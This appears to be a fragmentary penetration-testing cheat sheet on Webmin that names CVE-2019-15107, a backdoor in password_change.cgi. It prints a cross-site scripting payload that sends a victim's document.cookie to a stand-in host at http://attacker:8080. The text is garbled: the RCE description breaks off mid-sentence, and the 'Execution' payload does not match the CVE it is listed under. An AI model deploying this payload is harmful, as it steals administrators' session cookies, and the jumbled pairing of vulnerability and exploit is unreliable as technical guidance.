Webmin Hacktricks Link

Webmin has a history of high-impact vulnerabilities. Always check for your specific version on Exploit-DB 1. Unauthenticated Remote Code Execution (RCE) The most famous example is CVE-2019-15107 (Webmin 1.890 to 1.920). A backdoor in the password_change.cgi Execution:

<img src=x onerror="fetch('/sysinfo.cgi?xss=<script>new Image().src='http://attacker:8080/?'+document.cookie</script>')">

: Edit miniserv.conf to move away from port 10000.